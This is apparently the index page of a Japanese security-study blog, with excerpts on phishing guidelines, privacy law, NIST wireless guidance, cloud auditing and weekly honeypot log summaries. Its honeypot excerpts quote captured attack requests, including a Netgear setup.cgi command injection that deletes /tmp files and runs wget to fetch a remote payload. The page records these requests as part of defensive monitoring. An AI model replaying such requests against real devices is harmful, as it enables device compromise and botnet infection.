家studyをつづって

IT技術に関することやセキュリティ、ガイドライン等学んだことをつづっていきます。

フィッシング対策ガイドラインの比較(2020年版と2019年版)

概要 フィッシング対策協議会では、フィッシング詐欺の被害を防ぐためにWebサービス事業者に向けた対策をまとめたガイドラインを公開しています。 www.antiphishing.jp 2020年度版では、最近の脅威動向を踏まえ対策要件を見直し、また、優先度の設定が見直さ…

個人情報保護法の2020年改正について

背景 色々なIT技術を使ったサービスが次々に登場し、個人情報を含む、様々な情報が活用されています。個人情報保護法ではそういった社会情勢を踏まえ、平成27年(2015年)より「いわゆる3年ごとの見直し」(附則第12条3項)を設けました。 個人情報保護法は…

2020年6月のIT・セキュリティトピック

2020年6月に気になったニュースをまとめます。 // 記事の投稿日 概要 2020/06/01 外出自粛によるECサイト利用増でフィッシングも増(BBSS) 2020/06/01 個人情報流出の54歳市職員、人事に不満か…懲戒免職 2020/06/01 Wi-Fi利用者や提供者向けセキュガイド…

Wowhoneypotログ分析(2020/05/23-2020/05/30)

概要 以前の記事で構築したWowhoneypotのログを集計した結果です。 // 対象期間 2020/05/23-2020/05/30 ログの集計 送信元 内容 検知数 0 103.113.106.15 \"GET / 1 103.145.12.53 \"GET / 1 103.50.5.230 \"GET / 1 104.248.33.135 \"GET / 1 104.248.92.71…

「Guidelines for Securing Wireless Local Area Networks(WLANs)」の概要 NIST SP800-153

Guidelines for Securing Wireless Local Area Networks(WLANs) NIST Special Publication 800-153 発行年月日:2012年2月 https://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-153.pdf // 概要 このガイドラインは、NISTが企業の無線LA…

GCPのセキュリティ設定を監査してみた「Scout Suite」

背景など 最近ではクラウドの利用が進んでおり、様々な企業がクラウド上にシステムを構築し、データを格納しています。 ascii.jp クラウドは常に新しい機能が開発されており、クラウドに対する理解が浅いままシステムを構築するとセキュリティの観点からは脆…

「政府情報システムにおけるクラウドサービスの利用に係る基本方針」の概要

政府情報システムにおけるクラウドサービスの利用に係る基本方針 発行年月日:2018年6月7日 https://cio.go.jp/sites/default/files/uploads/documents/cloud_%20policy.pdf // 概要 内閣官房IT総合戦略室は、標準ガイドライン付属文書に「政府情報システム…

Wowhoneypotログ分析(2020/05/18-2020/05/22)

概要 以前の記事で構築したWowhoneypotのログを集計した結果です。 // 対象期間 2020/05/18-2020/05/22 ログの集計 送信元 内容 検知数 0 105.155.16.59 \"POST /cgi-bin/mainfunction.cgi 1 114.67.202.10 \"GET /TP/public/index.php 1 =1"}">\"GET /TP/pu…

ネットワークセキュリティ製品のテスト基準を策定する「NetSecOpen」

先日、Sonicwallの製品評価に関する記事を読みました。 blog.sonicwall.com 上記の記事に出てきた「NetSecOpen」について調べてみました。 // NetSecOpenとは NetSecOPENは、ネットワークセキュリティベンダー等が参加している、会員制の非営利団体で、ネッ…

Wowhoneypotログ分析(2020/05/11-2020/05/17)

概要 以前の記事で構築したWowhoneypotのログを集計した結果です。 // 対象期間 2020/05/11-2020/05/17 ログの集計 送信元 内容 検知数 0 110.154.182.132 \"GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8…